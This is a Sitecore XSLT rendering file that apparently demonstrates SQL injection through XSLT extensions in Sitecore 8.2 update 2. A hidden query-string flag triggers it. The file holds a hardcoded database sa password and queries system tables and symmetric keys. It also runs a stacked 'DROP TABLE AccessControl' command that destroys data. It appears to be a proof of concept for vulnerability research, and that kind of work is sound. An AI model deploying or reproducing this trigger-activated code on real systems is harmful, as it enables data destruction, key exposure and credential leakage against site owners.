﻿<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet version="1.0"
  xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
  xmlns:sc="http://www.sitecore.net/sc"
  xmlns:sql="http://www.sitecore.net/sql"
  exclude-result-prefixes="sc sql">

  <!-- output directives -->
  <xsl:output method="html" indent="no" encoding="UTF-8"  />

  <!-- sitecore parameters -->
  <xsl:param name="lang" select="'en'"/>
  <xsl:param name="id" select="''"/>
  <xsl:param name="sc_item"/>
  <xsl:param name="sc_currentitem"/>
   
  <!-- entry point -->
  <xsl:template match="*">
    <div>
      <h1 class="contentTitle">
        <sc:text field="title"/>
        <xsl:if test="sc:ToLower(sc:qs('sqli_enable'))='true' or sc:qs('sqli_enable')='1'"> - sqli_enable</xsl:if>
      </h1>
      
      <div class="contentDescription">
        <xsl:choose>
         <xsl:when
         test="sc:ToLower(sc:qs('sqli_enable'))='true' or sc:qs('sqli_enable')='1'">
            <!-- Execute the SQL queries -->
         
            <xsl:variable name="connection" select="sql:connect('Data Source=.;Initial Catalog=sc.infosecSitecore_web;Integrated Security=False;User ID=sa;Password=Philpot10EC')" />

            <h2>'select * from Items'</h2>
            <p>We have access to content database <em>Items table</em> by default</p>
            
            <xsl:variable name="Items" select="sql:select('select * from Items')"/>
            Item count: <xsl:value-of select="sql:count()"/>


            <h2>'select * from sys.tables'</h2>
            <p>We have access to <em>sys.tables</em> by default</p>
            
            <xsl:variable name="sys.tables" select="sql:select('select * from sys.tables')"/>
            Item count: <xsl:value-of select="sql:count()"/>


            <h2>'select * from master.sys.tables'</h2>
            <p>We have access to <em>master.sys.tables</em> by default</p>

            <xsl:variable name="master.sys.tables" select="sql:select('select * from master.sys.tables')"/>
            Item count: <xsl:value-of select="sql:count()"/>
            
            
            <h2>'select * from master.sys.symmetric_keys'</h2>
            <p>We have access to <em>master.sys.symmetric_keys</em> by default</p>
            <p>Note: All of these would be nasty to invoke...
            <pre>
            select * from master.sys.symmetric_keys

            select name, algorithm_desc from master.sys.symmetric_keys

            select * from master.sys.asymmetric_keys
            </pre>
            </p>
            
            <xsl:variable name="master.sys.symmetric_keys" select="sql:select('select * from master.sys.symmetric_keys')"/>
            Item count: <xsl:value-of select="sql:count()"/>      
            
            <h2>'select * from Items; DROP TABLE AccessControl'</h2>
            <p><a href="https://xkcd.com/327/">SQLi</a> is possible via XSLT extensions in default install of Sitecore 8.2 update 2 release</p>
            sys.tables count before  SQLi cmd: 
                <xsl:value-of select="sql:select('select * from sys.tables')"/> 
                <xsl:value-of select="sql:count()"/>
            <br/>              
            
            <xsl:variable name="drop.tables" select="sql:select('select * from Items; DROP TABLE AccessControl')"/>
            Item count: <xsl:value-of select="sql:count()"/>
            <br/>
            sys.tables count after SQLi cmd: 
                <xsl:value-of select="sql:select('select * from sys.tables')"/> 
                <xsl:value-of select="sql:count()"/>

         </xsl:when>
         <xsl:otherwise>
            <sc:text field="text" />
         </xsl:otherwise>
        </xsl:choose>     
        
      </div>
    </div>
  </xsl:template>

</xsl:stylesheet>
